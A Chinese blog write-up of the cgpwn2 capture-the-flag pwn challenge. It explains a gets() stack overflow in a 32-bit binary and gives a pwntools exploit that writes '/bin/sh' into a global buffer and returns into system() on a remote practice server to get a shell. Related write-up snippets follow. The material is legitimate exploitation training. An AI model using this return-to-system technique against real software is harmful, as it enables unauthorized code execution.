cgpwn2的Wp

最新推荐文章于 2024-07-10 21:47:00 发布
最新推荐文章于 2024-07-10 21:47:00 发布
阅读量204 收藏
点赞数
分类专栏: PWN 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WangLal/article/details/114740531
版权

攻防世界PWN

CGPWN2的wp

基本三步:checksec,file,执行文件

在这里插入图片描述
一个32位文件,开了NX防护,扔进IDA中查看

IDA

main中只有一个函数hello,点击查看
在这里插入图片描述
在我看来上面那一段,没什么太大意义,主要要是框起来的一部分
在这里插入图片描述
可以看出,我们有两次输入,一次fgets输入规定了长度,而第二次gets没有规定,所有这里有个漏洞。
看下列表中的其他函数发现在pwn函数中调用了system函数,
在这里插入图片描述"echo hehehe"这条命令没什么作用,所以要将参数改为’\bin\sh’命令(执行shell)或’cat flag’(直接获取flag)命令。
通过给name赋值,把cat flag或/bin/sh命令
#system函数的地址和name的地址
在这里插入图片描述
sys_adder = 0x08048420
在这里插入图片描述
name_adder = 0x0804A080

在这里插入图片描述

0x26+4即可到达返回地址。

EXP

from pwn import *
r = remote(“111.200.241.244”,58106)
#r = process("./cgpwn")
sys_adder = 0x08048420
name_adder = 0x0804A080
payload = b’a’*0x26+b’aaaa’ + p32(sys_adder) + b’a’*4 +p32(name_adder)
r.recvuntil(“your name”)
b’please tell me your name’
r.sendline("/bin/sh")
#r.sendline(“cat flag”)
r.recvuntil(“leave some message here:”)
b’\nhello,you can leave some message here:’
r.sendline(payload)
r.interactive()
cat flag成功获取flag。
在这里插入图片描述
还有一种是给name赋值cat flag
在这里插入图片描述

六级标题
Wanglpl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
wp2pcs百度网盘
01-10
wP2PCS把你的WordPress和百度个人云存储(百度网盘)联系在一起,将百度网盘作为你的网站后备箱,你可以将WordPress备份到百度云,可以把图片放在百度云,可以利用百度云为你的网站提供下载,利用云存储随时随地同步...
wp2 密码包
01-09
wp2 密码包
cgpwn2wp
wuyvle的博客
01-23 140
cgpwn2Linux康康,是32位无金丝雀 放进ida32康康 看来就这个hello有点意思,点进去康康 一看下面有个gets函数,有思路了,点开s康康 查看堆栈 利用r溢出返回我们要的函数,康康函数表 这有个pwn函数,进去康康 system函数,给它一个/bin/sh hello在bss段上,写进去一个/bin/sh 在最后get那溢出一次就行了 开始写脚本 from pwn import * r = remote('111.198.29.45',51186) target = 0x
cgpwn2 writeup
ditto的博客
01-07 1712
拿到题目检查防护: 简单运行下: 放到ida里看下: hello函数的代码如下: char *hello() { char *v0; // eax signed int v1; // ebx unsigned int v2; // ecx char *v3; // eax char s; // [esp+12h] [ebp-26h] int v6; // [esp+1...
攻防世界 cgpwn2
BengDouLove的博客
03-19 452
乍一看是个普通的溢出,但是没有给binsh字符串,我就想到bugku pwn4里面也是没有字符串,用的$0做字符串,也达到binsh的效果 可是一看只有$么得$0… 然后我就开动脑筋,这回还真没看别人的wp,自己想的,可喜可贺 我灵机一动,,前面输入名字是什么玩意,,点进去name一看在bss段上,,那不就可以找到了,他也没开pie 第一次输入/bin/sh不就完了,然后第二次溢出覆盖返回...
WP2-ctfshow
02-24
2
wp2
03-27
【标题】"wp2"可能指的是WordPress的二次开发或者一个特定的WordPress主题或插件,因为"wp"通常是WordPress的缩写。在这个上下文中,它可能是关于如何利用PHP语言进行WordPress定制的一个知识点。 【描述】虽然提供...
wp开发工具2
01-04
WP用户登录界面开发,在移动端可以帮助用户剩下开发时间,提升开发效率!
linux/shell】linux如何去除字符串中空格
qq_35902025的博客
07-06 411
linux如何去除字符串中空格 tr命令可以用来替换或删除字符 sed是一个流编辑器,可以用来处理文本
RedHat运维-LinuxSELinux基础4-端口绑定SELinux上下文
a15735748145a的博客
07-06 632
12. 将60001/tcp端口上的SELinux上下文由http_port_t调整为gopher_port_t的方法是______________________;13. 将60002/tcp端口上的SELinux上下文由gopher_port_t调整为ssh_port_t的方法是______________________;14. 将60003/tcp端口上的SELinux上下文由ssh_port_t调整为http_port_t的方法是_______________________;
Linux_实现简易日志系统
安权_code的博客
07-07 973
Linux下实现一个日志系统,该日志系统主要用于打印和记录程序的格式化信息,还可以对信息做分析处理,比如把信息分为五种类型:正常运行信息、测试信息,警告信息,错误信息、致命信息,当然还可以显示信息产生的具体时间,并且能够对这些信息进行存档归类。
Linux x86_64平台指令替换函数 text_poke_smp/bp
小立仔
07-05 901
Linux x86_64平台指令替换函数 text_poke_smp/bp简介
linux积累-core文件是干啥的
hebtu666
07-09 549
核心转储(core dump)文件是一个程序崩溃时所产生的文件,它记录了程序崩溃时的内存状态,包括程序计数器和寄存器内容等信息。此外,如果程序是在特定的库或者环境中运行时崩溃的,你可能还需要安装那些库的调试符号,并在调试器中设置相应的环境变量。: 当你有了核心转储文件后,你可以使用像GDB(GNU调试器)这样的调试器来分析它。首先,你需要确保你有相应的程序的带调试符号的可执行文件。: 根据调试器提供的信息,你可以检查源代码中可能导致问题的部分,例如无效的指针引用、数组越界或其他违反程序逻辑的操作。
LVGL ArchLinux VSCode环境运行
Sandman06的博客
07-10 200
很多包在Arch中名字都不一样,我配合GPT,找到了相同功能的包,配合官方步骤,大致过程如下。vscode用AUR管理器安装”visual-studio-code-bin“LVGL官方的Demo是跑在Ubuntu系的系统上的。# 用如下指令代替Ubuntu系apt指令。git保证项目完整,各模块更新就能跑起来了。# VSCode安装。
Linux 例题及详解
weixin_72040293的博客
07-10 600
Linux例题
Android关闭SLinux
lmpt90的专栏
07-07 341
adb shell getenforce 查看当前 Selinux 状态是 permissive(关闭)还是 enforce(打开)的。adb shell setenforce 0 开Selinux:设置成模式permissive。adb shell setenforce 1 关Selinux:设置成模式enforce。调试Android的时候有时需要关闭Selinux验证问题。总结下关闭SELinux的方法。
RedHat运维-Linux文本操作基础-SED基础
a15735748145a的博客
07-06 393
34. 假设当前工作目录为/home/opensuse/Desktop/,有两份文件a.txt与aa.txt,现如果想将a.txt中所有字符串“Shenzhen”都替换为“Nanshan”,并且将替换完成的行打印出来,再覆盖写到aa.txt文件中,则命令为________________________________________________;
Linux 线程】线程的基本概念、LWP的理解
最新发布
Hou_lang_LJ的博客
07-10 245
🐧① Linux 线程的基本概念;
E2PROM的WP是什么意思
09-06
E2PROM的WP是写保护位(Write Protect)的缩写。他是一个控制引脚,通常用于保护E2PROM的写入操作免受不希望的修改。当WP引脚被拉低时,E2PROM的写入操作会被禁用,从而防止对存储的数据进行修改。通过使用写保护位...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值